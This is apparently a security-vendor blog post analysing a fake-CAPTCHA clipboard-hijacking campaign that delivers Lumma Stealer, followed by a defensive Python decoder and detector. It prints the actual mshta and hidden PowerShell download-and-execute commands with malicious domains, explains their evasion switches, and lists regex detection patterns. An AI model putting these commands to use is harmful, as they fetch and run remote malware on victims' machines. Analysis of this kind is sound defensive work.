
How a clipboard hijacker delivers Lumma Stealer
The use of fake Captcha websites has doubled in only a few months.
Cybercriminal tactics ebb and flow over time, depending on environmental factors, the preferences of the groups involved, and what’s making money. Right now, criminals are showing renewed enthusiasm for clipboard hijacking and fake CAPTCHAs, a tactic that fools users into pasting malicious code into their computers.
Earlier this month, we described in detail how cybercriminals used clipboard hijacking to infect website visitors with a Trojan. The attack relied on a CAPTCHA lookalike with instructions that paste the clipboard contents into a command line.

The fake CAPTCHA instructions are found on all kinds of websites, but mostly fake web shops, news sites, and websites offering media like music and movies.
As researchers from ReliaQuest recently pointed out, the number of fake CAPTCHA pages nearly doubled from September 2024 to December 2024. And it’s not just criminals spreading Remote Access Trojans and information stealers any more—advanced threat actors like APT28 (aka Fancy Bear) are successfully employing these tactics as well.
So, we decided to dive a bit deeper into the tactics, techniques, and procedures (TTPs) behind these attacks.
Our Managed Detection & Response (MDR) team soon found an example where cybercriminals tried to infect one of our customers with Lumma Stealer malware.
The website tried to load the following command into the victim’s clipboard. Executing the instructions on the fake CAPTCHA would have pasted it into a command line and run it.
mshta https://eprime.shop/s6.mp3 ''I am not a robot - reCAPTCHA Verification ID: 2165
The command uses a trusted utility, MSHTA, to download an encoded PowerShell script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 Enc JABkAFEAQwa2AEYAbgB4AHAAOQBDAHkaZAA4AEwATgBTAGMARwBqAFoAVABCAG...BHAF0AOgA6AEEAUwBDAEkASQAkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
- The -w 1 (-WindowStyle 1, i.e. Hidden) switch ensures the PowerShell window isn’t visible while the script runs.
- The -Enc (-EncodedCommand) switch indicates that the command that follows is Base64-encoded.
Effectively, this script downloads a very obfuscated PowerShell script called Nusku.jpeg.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command
'iex((New-Object System.Net.WebClient).DownloadString('https://n.kliphirofey.shop/Nusku.jpeg'))'
- The -ep bypass (-ExecutionPolicy Bypass) switch lets PowerShell run scripts without restriction, ignoring the current execution policy.
- The -nop (-NoProfile) switch prevents PowerShell from loading the user profile scripts at startup. This speeds up startup and avoids interference from any user-specific configuration or scripts set in the profile.
- The -Command switch indicates that what follows will be a command or script to execute directly in PowerShell.
The script hidden in Nusku.jpeg contains numerous complex mathematical operations and variable assignments that obscure its purpose, along with several while loops and conditional statements that control the flow of execution based on the values of those variables. The main reason for this complexity is to frustrate reverse engineering and sandbox analysis, which may give up if the script takes too long to unwind.
Thankfully, one of our researchers spotted the significant part of the script: a function called fdsjnh.

This function decodes a Base64-encoded string that has been obfuscated through character manipulation and XOR encryption. The key steps involve creating an ArrayList from a string, decoding it from Base64, and then decrypting it using an XOR operation with another byte array derived from a hardcoded string.
Manually, you would have to de-obfuscate this script by looking for repeated calculations, checking whether they can be simplified, and then breaking the complex expressions down into simpler, more readable forms.
But with help from the researcher, putting a breakpoint on the return expression of the fdsjnh function did the job. (The variable $kcuVdyrjJenvYgEdy contains the second script.)
This script turned out to be responsible for loading and executing a Portable Executable (PE) payload—Lumma Stealer—in memory, although it could be used to drop any type of malware in the memory of an affected system.
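To triage a chain like this, an analyst has to reverse the two encodings described above: the -Enc wrapper (Base64 over UTF-16LE text) and the Base64-then-XOR step inside fdsjnh. The Python helper below is an added example, not code from this article or from the malware; the sample command, the key "k3y", the placeholder URL, and the assumption that the XOR key is simply the UTF-8 bytes of the hardcoded string are all constructed here.

```python
import base64
import re

# Constructed sample (not the real payload): the inner command shape from the
# article, encoded the way PowerShell -EncodedCommand expects (UTF-16LE -> Base64).
INNER_CMD = ("powershell.exe -w hidden -ep bypass -nop -Command "
             "'iex((New-Object System.Net.WebClient).DownloadString("
             "'https://example.invalid/Nusku.jpeg'))'")  # placeholder URL
SAMPLE_ENC = base64.b64encode(INNER_CMD.encode("utf-16-le")).decode()

# Switches and tokens the article calls out; any of them in a decoded
# command line is worth a closer look in process-creation telemetry.
SUSPICIOUS = [r"-w\s+(1|hidden)", r"-ep\s+bypass", r"-nop\b", r"\biex\b",
              r"DownloadString", r"\bmshta\b"]


def decode_encoded_command(b64: str) -> str:
    """Reverse PowerShell -Enc: Base64 -> UTF-16LE bytes -> text."""
    return base64.b64decode(b64).decode("utf-16-le")


def flag_command(cmd: str) -> list[str]:
    """Return the suspicious patterns present in a (decoded) command line."""
    return [p for p in SUSPICIOUS if re.search(p, cmd, re.IGNORECASE)]


def xor_base64_decode(blob_b64: str, key_text: str) -> str:
    """Mirror the fdsjnh step: Base64-decode the blob, then XOR it with a
    repeating key. Assumption: the key is the UTF-8 bytes of the hardcoded string."""
    data = base64.b64decode(blob_b64)
    key = key_text.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode()


def xor_base64_encode(plain: str, key_text: str) -> str:
    """Inverse of xor_base64_decode; used here only to build a constructed sample."""
    key = key_text.encode()
    raw = bytes(b ^ key[i % len(key)] for i, b in enumerate(plain.encode()))
    return base64.b64encode(raw).decode()


if __name__ == "__main__":
    decoded = decode_encoded_command(SAMPLE_ENC)
    print(decoded)
    print("flags:", flag_command(decoded))
    stage2 = xor_base64_encode("Write-Host stage2", "k3y")  # constructed blob
    print(xor_base64_decode(stage2, "k3y"))
```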
IOCs